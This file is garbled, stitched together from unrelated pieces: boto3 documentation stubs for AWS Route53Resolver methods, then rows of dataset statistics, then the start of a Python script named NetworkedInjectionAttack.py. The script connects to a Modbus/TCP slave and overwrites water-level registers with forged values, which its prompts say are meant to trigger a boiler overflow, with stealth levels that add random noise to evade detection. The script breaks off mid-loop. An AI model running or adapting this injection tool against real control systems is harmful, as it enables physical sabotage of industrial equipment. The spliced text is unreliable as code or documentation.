    :param Filters: An optional specification to return a subset of resolver endpoints, such as all inbound resolver endpoints.\n\nNote\nIf you submit a second or subsequent ListResolverEndpoints request and specify the NextToken parameter, you must use the same values for Filters , if any, as in the previous request.\n\n\n(dict) --For List operations, an optional specification to return a subset of objects, such as resolver endpoints or resolver rules.\n\nName (string) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the name of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify Direction for the value of Name .\n\nValues (list) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the value of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify INBOUND for the value of Values .\n\n(string) --\n\n\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {
    'NextToken': 'string',
    'MaxResults': 123,
    'ResolverEndpoints': [
    {
    'Id': 'string',
    'CreatorRequestId': 'string',
    'Arn': 'string',
    'Name': 'string',
    'SecurityGroupIds': [
    'string',
    ],
    'Direction': 'INBOUND'|'OUTBOUND',
    'IpAddressCount': 123,
    'HostVPCId': 'string',
    'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
    'StatusMessage': 'string',
    'CreationTime': 'string',
    'ModificationTime': 'string'
    },
    ]
    }
    Response Structure
    (dict) --
    NextToken (string) --
    If more than MaxResults IP addresses match the specified criteria, you can submit another ListResolverEndpoint request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
    MaxResults (integer) --
    The value that you specified for MaxResults in the request.
    ResolverEndpoints (list) --
    The resolver endpoints that were created by using the current AWS account, and that match the specified filters, if any.
    (dict) --
    In the response to a CreateResolverEndpoint , DeleteResolverEndpoint , GetResolverEndpoint , ListResolverEndpoints , or UpdateResolverEndpoint request, a complex type that contains settings for an existing inbound or outbound resolver endpoint.
    Id (string) --
    The ID of the resolver endpoint.
    CreatorRequestId (string) --
    A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
    Arn (string) --
    The ARN (Amazon Resource Name) for the resolver endpoint.
    Name (string) --
    The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
    SecurityGroupIds (list) --
    The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
    (string) --
    Direction (string) --
    Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
    INBOUND : allows DNS queries to your VPC from your network or another VPC
    OUTBOUND : allows DNS queries from your VPC to your network or another VPC
    IpAddressCount (integer) --
    The number of IP addresses that the resolver endpoint can use for DNS queries.
    HostVPCId (string) --
    The ID of the VPC that you want to create the resolver endpoint in.
    Status (string) --
    A code that specifies the current status of the resolver endpoint.
    StatusMessage (string) --
    A detailed description of the status of the resolver endpoint.
    CreationTime (string) --
    The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
    ModificationTime (string) --
    The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
    Exceptions
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {
    'NextToken': 'string',
    'MaxResults': 123,
    'ResolverEndpoints': [
    {
    'Id': 'string',
    'CreatorRequestId': 'string',
    'Arn': 'string',
    'Name': 'string',
    'SecurityGroupIds': [
    'string',
    ],
    'Direction': 'INBOUND'|'OUTBOUND',
    'IpAddressCount': 123,
    'HostVPCId': 'string',
    'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
    'StatusMessage': 'string',
    'CreationTime': 'string',
    'ModificationTime': 'string'
    },
    ]
    }
    :returns:
    (string) --
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def list_resolver_rule_associations(MaxResults=None, NextToken=None, Filters=None):
    """
    Lists the associations that were created between resolver rules and VPCs using the current AWS account.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.list_resolver_rule_associations(
    MaxResults=123,
    NextToken='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ]
    )
    :type MaxResults: integer
    :param MaxResults: The maximum number of rule associations that you want to return in the response to a ListResolverRuleAssociations request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 rule associations.
    :type NextToken: string
    :param NextToken: For the first ListResolverRuleAssociation request, omit this value.\nIf you have more than MaxResults rule associations, you can submit another ListResolverRuleAssociation request to get the next group of rule associations. In the next request, specify the value of NextToken from the previous response.\n
    :type Filters: list
    :param Filters: An optional specification to return a subset of resolver rules, such as resolver rules that are associated with the same VPC ID.\n\nNote\nIf you submit a second or subsequent ListResolverRuleAssociations request and specify the NextToken parameter, you must use the same values for Filters , if any, as in the previous request.\n\n\n(dict) --For List operations, an optional specification to return a subset of objects, such as resolver endpoints or resolver rules.\n\nName (string) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the name of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify Direction for the value of Name .\n\nValues (list) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the value of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify INBOUND for the value of Values .\n\n(string) --\n\n\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {
    'NextToken': 'string',
    'MaxResults': 123,
    'ResolverRuleAssociations': [
    {
    'Id': 'string',
    'ResolverRuleId': 'string',
    'Name': 'string',
    'VPCId': 'string',
    'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
    'StatusMessage': 'string'
    },
    ]
    }
    Response Structure
    (dict) --
    NextToken (string) --
    If more than MaxResults rule associations match the specified criteria, you can submit another ListResolverRuleAssociation request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
    MaxResults (integer) --
    The value that you specified for MaxResults in the request.
    ResolverRuleAssociations (list) --
    The associations that were created between resolver rules and VPCs using the current AWS account, and that match the specified filters, if any.
    (dict) --
    In the response to an AssociateResolverRule , DisassociateResolverRule , or ListResolverRuleAssociations request, information about an association between a resolver rule and a VPC.
    Id (string) --
    The ID of the association between a resolver rule and a VPC. Resolver assigns this value when you submit an AssociateResolverRule request.
    ResolverRuleId (string) --
    The ID of the resolver rule that you associated with the VPC that is specified by VPCId .
    Name (string) --
    The name of an association between a resolver rule and a VPC.
    VPCId (string) --
    The ID of the VPC that you associated the resolver rule with.
    Status (string) --
    A code that specifies the current status of the association between a resolver rule and a VPC.
    StatusMessage (string) --
    A detailed description of the status of the association between a resolver rule and a VPC.
    Exceptions
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {
    'NextToken': 'string',
    'MaxResults': 123,
    'ResolverRuleAssociations': [
    {
    'Id': 'string',
    'ResolverRuleId': 'string',
    'Name': 'string',
    'VPCId': 'string',
    'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
    'StatusMessage': 'string'
    },
    ]
    }
    :returns:
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def list_resolver_rules(MaxResults=None, NextToken=None, Filters=None):
    """
    Lists the resolver rules that were created using the current AWS account.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.list_resolver_rules(
    MaxResults=123,
    NextToken='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ]
    )
    :type MaxResults: integer
    :param MaxResults: The maximum number of resolver rules that you want to return in the response to a ListResolverRules request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 resolver rules.
    :type NextToken: string
    :param NextToken: For the first ListResolverRules request, omit this value.\nIf you have more than MaxResults resolver rules, you can submit another ListResolverRules request to get the next group of resolver rules. In the next request, specify the value of NextToken from the previous response.\n
    :type Filters: list
    :param Filters: An optional specification to return a subset of resolver rules, such as all resolver rules that are associated with the same resolver endpoint.\n\nNote\nIf you submit a second or subsequent ListResolverRules request and specify the NextToken parameter, you must use the same values for Filters , if any, as in the previous request.\n\n\n(dict) --For List operations, an optional specification to return a subset of objects, such as resolver endpoints or resolver rules.\n\nName (string) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the name of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify Direction for the value of Name .\n\nValues (list) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the value of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify INBOUND for the value of Values .\n\n(string) --\n\n\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {
    'NextToken': 'string',
    'MaxResults': 123,
    'ResolverRules': [
    {
    'Id': 'string',
    'CreatorRequestId': 'string',
    'Arn': 'string',
    'DomainName': 'string',
    'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
    'StatusMessage': 'string',
    'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
    'Name': 'string',
    'TargetIps': [
    {
    'Ip': 'string',
    'Port': 123
    },
    ],
    'ResolverEndpointId': 'string',
    'OwnerId': 'string',
    'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
    },
    ]
    }
    Response Structure
    (dict) --
    NextToken (string) --
    If more than MaxResults resolver rules match the specified criteria, you can submit another ListResolverRules request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
    MaxResults (integer) --
    The value that you specified for MaxResults in the request.
    ResolverRules (list) --
    The resolver rules that were created using the current AWS account and that match the specified filters, if any.
    (dict) --
    For queries that originate in your VPC, detailed information about a resolver rule, which specifies how to route DNS queries out of the VPC. The ResolverRule parameter appears in the response to a CreateResolverRule , DeleteResolverRule , GetResolverRule , ListResolverRules , or UpdateResolverRule request.
    Id (string) --
    The ID that Resolver assigned to the resolver rule when you created it.
    CreatorRequestId (string) --
    A unique string that you specified when you created the resolver rule. CreatorRequestId identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
    Arn (string) --
    The ARN (Amazon Resource Name) for the resolver rule specified by Id .
    DomainName (string) --
    DNS queries for this domain name are forwarded to the IP addresses that are specified in TargetIps . If a query matches multiple resolver rules (example.com and www.example.com), the query is routed using the resolver rule that contains the most specific domain name (www.example.com).
    Status (string) --
    A code that specifies the current status of the resolver rule.
    StatusMessage (string) --
    A detailed description of the status of a resolver rule.
    RuleType (string) --
    This value is always FORWARD . Other resolver rule types aren\'t supported.
    Name (string) --
    The name for the resolver rule, which you specified when you created the resolver rule.
    TargetIps (list) --
    An array that contains the IP addresses and ports that you want to forward
    (dict) --
    In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.
    Ip (string) --
    One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.
    Port (integer) --
    The port at Ip that you want to forward DNS queries to.
    ResolverEndpointId (string) --
    The ID of the endpoint that the rule is associated with.
    OwnerId (string) --
    When a rule is shared with another AWS account, the account ID of the account that the rule is shared with.
    ShareStatus (string) --
    Whether the rule is shared and, if so, whether the current account is sharing the rule with another account, or another account is sharing the rule with the current account.
    Exceptions
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {
    'NextToken': 'string',
    'MaxResults': 123,
    'ResolverRules': [
    {
    'Id': 'string',
    'CreatorRequestId': 'string',
    'Arn': 'string',
    'DomainName': 'string',
    'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
    'StatusMessage': 'string',
    'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
    'Name': 'string',
    'TargetIps': [
    {
    'Ip': 'string',
    'Port': 123
    },
    ],
    'ResolverEndpointId': 'string',
    'OwnerId': 'string',
    'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
    },
    ]
    }
    :returns:
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def list_tags_for_resource(ResourceArn=None, MaxResults=None, NextToken=None):
    """
    Lists the tags that you associated with the specified resource.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.list_tags_for_resource(
    ResourceArn='string',
    MaxResults=123,
    NextToken='string'
    )
    :type ResourceArn: string
    :param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource that you want to list tags for.\n
    :type MaxResults: integer
    :param MaxResults: The maximum number of tags that you want to return in the response to a ListTagsForResource request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 tags.
    :type NextToken: string
    :param NextToken: For the first ListTagsForResource request, omit this value.\nIf you have more than MaxResults tags, you can submit another ListTagsForResource request to get the next group of tags for the resource. In the next request, specify the value of NextToken from the previous response.\n
    :rtype: dict
    ReturnsResponse Syntax
    {
    'Tags': [
    {
    'Key': 'string',
    'Value': 'string'
    },
    ],
    'NextToken': 'string'
    }
    Response Structure
    (dict) --
    Tags (list) --
    The tags that are associated with the resource that you specified in the ListTagsForResource request.
    (dict) --
    One tag that you want to add to the specified resource. A tag consists of a Key (a name for the tag) and a Value .
    Key (string) --
    The name for the tag. For example, if you want to associate Resolver resources with the account IDs of your customers for billing purposes, the value of Key might be account-id .
    Value (string) --
    The value for the tag. For example, if Key is account-id , then Value might be the ID of the customer account that you\'re creating the resource for.
    NextToken (string) --
    If more than MaxResults tags match the specified criteria, you can submit another ListTagsForResource request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
    Exceptions
    Route53Resolver.Client.exceptions.ResourceNotFoundException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {
    'Tags': [
    {
    'Key': 'string',
    'Value': 'string'
    },
    ],
    'NextToken': 'string'
    }
    :returns:
    Route53Resolver.Client.exceptions.ResourceNotFoundException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def put_resolver_rule_policy(Arn=None, ResolverRulePolicy=None):
    """
    Specifies the Resolver operations and resources that you want to allow another AWS account to be able to use.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.put_resolver_rule_policy(
    Arn='string',
    ResolverRulePolicy='string'
    )
    :type Arn: string
    :param Arn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the account that you want to grant permissions to.\n
    :type ResolverRulePolicy: string
    :param ResolverRulePolicy: [REQUIRED]\nAn AWS Identity and Access Management policy statement that lists the permissions that you want to grant to another AWS account.\n
    :rtype: dict
    ReturnsResponse Syntax
    {
    'ReturnValue': True|False
    }
    Response Structure
    (dict) --
    The response to a PutResolverRulePolicy request.
    ReturnValue (boolean) --
    Whether the PutResolverRulePolicy request was successful.
    Exceptions
    Route53Resolver.Client.exceptions.InvalidPolicyDocument
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.UnknownResourceException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    :return: {
    'ReturnValue': True|False
    }
    :returns:
    Route53Resolver.Client.exceptions.InvalidPolicyDocument
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.UnknownResourceException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def tag_resource(ResourceArn=None, Tags=None):
    """
    Adds one or more tags to a specified resource.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.tag_resource(
    ResourceArn='string',
    Tags=[
    {
    'Key': 'string',
    'Value': 'string'
    },
    ]
    )
    :type ResourceArn: string
    :param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource that you want to add tags to. To get the ARN for a resource, use the applicable Get or List command:\n\nGetResolverEndpoint\nGetResolverRule\nGetResolverRuleAssociation\nListResolverEndpoints\nListResolverRuleAssociations\nListResolverRules\n\n
    :type Tags: list
    :param Tags: [REQUIRED]\nThe tags that you want to add to the specified resource.\n\n(dict) --One tag that you want to add to the specified resource. A tag consists of a Key (a name for the tag) and a Value .\n\nKey (string) --The name for the tag. For example, if you want to associate Resolver resources with the account IDs of your customers for billing purposes, the value of Key might be account-id .\n\nValue (string) --The value for the tag. For example, if Key is account-id , then Value might be the ID of the customer account that you\'re creating the resource for.\n\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    Route53Resolver.Client.exceptions.LimitExceededException
    Route53Resolver.Client.exceptions.ResourceNotFoundException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InvalidTagException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def untag_resource(ResourceArn=None, TagKeys=None):
    """
    Removes one or more tags from a specified resource.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.untag_resource(
    ResourceArn='string',
    TagKeys=[
    'string',
    ]
    )
    :type ResourceArn: string
    :param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource that you want to remove tags from. To get the ARN for a resource, use the applicable Get or List command:\n\nGetResolverEndpoint\nGetResolverRule\nGetResolverRuleAssociation\nListResolverEndpoints\nListResolverRuleAssociations\nListResolverRules\n\n
    :type TagKeys: list
    :param TagKeys: [REQUIRED]\nThe tags that you want to remove from the specified resource.\n\n(string) --\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    Route53Resolver.Client.exceptions.ResourceNotFoundException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def update_resolver_endpoint(ResolverEndpointId=None, Name=None):
    """
    Updates the name of an inbound or an outbound resolver endpoint.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.update_resolver_endpoint(
    ResolverEndpointId='string',
    Name='string'
    )
    :type ResolverEndpointId: string
    :param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to update.\n
    :type Name: string
    :param Name: The name of the resolver endpoint that you want to update.
    :rtype: dict
    ReturnsResponse Syntax
    {
    'ResolverEndpoint': {
    'Id': 'string',
    'CreatorRequestId': 'string',
    'Arn': 'string',
    'Name': 'string',
    'SecurityGroupIds': [
    'string',
    ],
    'Direction': 'INBOUND'|'OUTBOUND',
    'IpAddressCount': 123,
    'HostVPCId': 'string',
    'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
    'StatusMessage': 'string',
    'CreationTime': 'string',
    'ModificationTime': 'string'
    }
    }
    Response Structure
    (dict) --
    ResolverEndpoint (dict) --
    The response to an UpdateResolverEndpoint request.
    Id (string) --
    The ID of the resolver endpoint.
    CreatorRequestId (string) --
    A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
    Arn (string) --
    The ARN (Amazon Resource Name) for the resolver endpoint.
    Name (string) --
    The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
    SecurityGroupIds (list) --
    The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
    (string) --
    Direction (string) --
    Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
    INBOUND : allows DNS queries to your VPC from your network or another VPC
    OUTBOUND : allows DNS queries from your VPC to your network or another VPC
    IpAddressCount (integer) --
    The number of IP addresses that the resolver endpoint can use for DNS queries.
    HostVPCId (string) --
    The ID of the VPC that you want to create the resolver endpoint in.
    Status (string) --
    A code that specifies the current status of the resolver endpoint.
    StatusMessage (string) --
    A detailed description of the status of the resolver endpoint.
    CreationTime (string) --
    The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
    ModificationTime (string) --
    The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
    Exceptions
    Route53Resolver.Client.exceptions.ResourceNotFoundException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InvalidRequestException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {
    'ResolverEndpoint': {
    'Id': 'string',
    'CreatorRequestId': 'string',
    'Arn': 'string',
    'Name': 'string',
    'SecurityGroupIds': [
    'string',
    ],
    'Direction': 'INBOUND'|'OUTBOUND',
    'IpAddressCount': 123,
    'HostVPCId': 'string',
    'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
    'StatusMessage': 'string',
    'CreationTime': 'string',
    'ModificationTime': 'string'
    }
    }
    :returns:
    (string) --
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def update_resolver_rule(ResolverRuleId=None, Config=None):
    """
    Updates settings for a specified resolver rule. ``ResolverRuleId`` is
    required; any setting you omit from ``Config`` retains its current value.

    See also: AWS API Documentation

    :example: response = client.update_resolver_rule(
        ResolverRuleId='string',
        Config={
            'Name': 'string',
            'TargetIps': [
                {
                    'Ip': 'string',
                    'Port': 123
                },
            ],
            'ResolverEndpointId': 'string'
        }
    )

    :type ResolverRuleId: string
    :param ResolverRuleId: [REQUIRED]
        The ID of the resolver rule that you want to update.

    :type Config: dict
    :param Config: [REQUIRED]
        The new settings for the resolver rule.

        - Name (string) -- The new name for the resolver rule. The name that
          you specify appears in the Resolver dashboard in the Route 53
          console.
        - TargetIps (list) -- For DNS queries that originate in your VPC, the
          new IP addresses that you want to route outbound DNS queries to.

          - (dict) -- One IP address that you want to forward DNS queries to.

            - Ip (string) -- [REQUIRED] One IP address that you want to
              forward DNS queries to. You can specify only IPv4 addresses.
            - Port (integer) -- The port at Ip that you want to forward DNS
              queries to.

        - ResolverEndpointId (string) -- The ID of the new outbound resolver
          endpoint that you want to use to route DNS queries to the IP
          addresses that you specify in TargetIps.

    :rtype: dict
    :return: {
        'ResolverRule': {
            'Id': 'string',
            'CreatorRequestId': 'string',
            'Arn': 'string',
            'DomainName': 'string',
            'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
            'StatusMessage': 'string',
            'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
            'Name': 'string',
            'TargetIps': [
                {
                    'Ip': 'string',
                    'Port': 123
                },
            ],
            'ResolverEndpointId': 'string',
            'OwnerId': 'string',
            'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
        }
    }

    ``ResolverRule`` in the response reflects the rule after the update:
    Id, CreatorRequestId, Arn, DomainName (queries for this domain are
    forwarded to TargetIps; the most specific matching rule wins), Status,
    StatusMessage, RuleType (always FORWARD -- other rule types are not
    supported for updates), Name, TargetIps, ResolverEndpointId, OwnerId
    (account that shared the rule, if shared), and ShareStatus.

    :raises: Route53Resolver.Client.exceptions.InvalidRequestException
    :raises: Route53Resolver.Client.exceptions.InvalidParameterException
    :raises: Route53Resolver.Client.exceptions.ResourceNotFoundException
    :raises: Route53Resolver.Client.exceptions.ResourceUnavailableException
    :raises: Route53Resolver.Client.exceptions.LimitExceededException
    :raises: Route53Resolver.Client.exceptions.InternalServiceErrorException
    :raises: Route53Resolver.Client.exceptions.ThrottlingException
    """
    pass
| 35.045655
| 1,159
| 0.699351
| 11,202
| 95,184
| 5.922425
| 0.046956
| 0.052862
| 0.078034
| 0.018223
| 0.886499
| 0.869481
| 0.857754
| 0.847128
| 0.829447
| 0.822212
| 0
| 0.006636
| 0.221025
| 95,184
| 2,715
| 1,160
| 35.058564
| 0.888126
| 0.972201
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
8292ea81822b51fd2b10933286814918f6a1c4c2
| 6,753
|
py
|
Python
|
Attacker/NetworkedInjectionAttack.py
|
jamster112233/ICS_IDS
|
dac6abc3c8d6e840a21adedcb9e8dcfaa304b499
|
[
"BSD-3-Clause"
] | null | null | null |
Attacker/NetworkedInjectionAttack.py
|
jamster112233/ICS_IDS
|
dac6abc3c8d6e840a21adedcb9e8dcfaa304b499
|
[
"BSD-3-Clause"
] | null | null | null |
Attacker/NetworkedInjectionAttack.py
|
jamster112233/ICS_IDS
|
dac6abc3c8d6e840a21adedcb9e8dcfaa304b499
|
[
"BSD-3-Clause"
] | null | null | null |
# Networked Modbus/TCP injection attack tool: forges slave sensor readings
# (response injection) or master commands (command injection) against a
# water-boiler ICS simulation, at a user-selected stealth level.
#
# BUG FIX: `random` was used (random.seed / random.randint) but never
# imported, so the script crashed with NameError on startup.
import random

import networkEncoder as ne
from pymodbus.client.sync import ModbusTcpClient

# Hostname of the Modbus/TCP slave under attack.
MODBUS_SLAVE = 'ms.ics.example.com'
# Fixed seed so the injected "noise" is reproducible between runs.
random.seed(100)
response = ''
client = ModbusTcpClient(MODBUS_SLAVE)
print("Sensors online, enter injection attack type:")
print("[r]esponse - Fake slave values to trigger overflow")
print("[c]ommand - Fake master values to trigger overflow")
print("[q]uit")
while response != 'r' and response != 'c' and response != 'q':
    response = input('>')
if response == 'q':
    exit(0)
if response == 'r':
    # Response injection: overwrite the slave's reported water level so the
    # master believes the boiler is under-filled and keeps adding water.
    print("Enter stealth level:")
    print("[1] - Blatantly obvious")
    print("[2] - Plausible")
    print("[3] - Harder to detect")
    print("[4] - Hard to detect")
    print("[q]uit")
    while response != '1' and response != '2' and response != '3' and response != '4' and response != 'q':
        response = input('>')
    if response == 'q':
        exit(0)
    if response == '1':
        while True:
            # 10,000L below optimum level
            results = []
            # NOTE(review): only 4 registers are read here, yet
            # registers[20] is assigned below, which would raise
            # IndexError; sibling branches read 19. Confirm the intended
            # read count against the slave's register map.
            result = client.read_holding_registers(3, 4, unit=1)
            waterLevel = ne.modbusDecode(0, 4, 4, result.registers)
            outputs = []
            levelElements = ne.modbusEncode(490000, 4, 4, outputs)
            result.registers[0] = levelElements[0]
            result.registers[1] = levelElements[1]
            result.registers[2] = levelElements[2]
            result.registers[3] = levelElements[3]
            result.registers[20] = 1
            write = client.write_registers(0, result.registers, unit=1)
    if response == '2':
        while True:
            # 1,000L below optimum level
            results = []
            # BUG FIX: the original call was `read_holding_registers(3, ,
            # unit=1)` -- a SyntaxError (missing count). Use 19 to match
            # the other response-injection branches, which read the same
            # address range and write back to the same offset.
            result = client.read_holding_registers(3, 19, unit=1)
            waterLevel = ne.modbusDecode(0, 4, 4, result.registers)
            outputs = []
            levelElements = ne.modbusEncode(499000, 4, 4, outputs)
            result.registers[0] = levelElements[0]
            result.registers[1] = levelElements[1]
            result.registers[2] = levelElements[2]
            result.registers[3] = levelElements[3]
            result.registers[20] = 1
            write = client.write_registers(3, result.registers, unit=1)
    if response == '3':
        while True:
            # Constantly 1,500L below optimum level +- 15%
            result = client.read_holding_registers(3, 19, unit=1)
            waterLevel = ne.modbusDecode(0, 4, 4, result.registers)
            waterLevel = 500000 - (1500 * (random.randint(85, 115) / 100))
            outputs = []
            levelElements = ne.modbusEncode(waterLevel, 4, 4, outputs)
            result.registers[0] = levelElements[0]
            result.registers[1] = levelElements[1]
            result.registers[2] = levelElements[2]
            result.registers[3] = levelElements[3]
            # NOTE(review): registers[20] requires a read count >= 21, but
            # only 19 registers were read -- TODO confirm intended count.
            result.registers[20] = 1
            write = client.write_registers(3, result.registers, unit=1)
    if response == '4':
        while True:
            # Constantly 1,500L below optimum level +- 15% + last add of
            # water from master
            result = client.read_holding_registers(3, 19, unit=1)
            addWater = ne.modbusDecode(0, 2, 2, result.registers)
            waterLevel = ne.modbusDecode(3, 4, 4, result.registers)
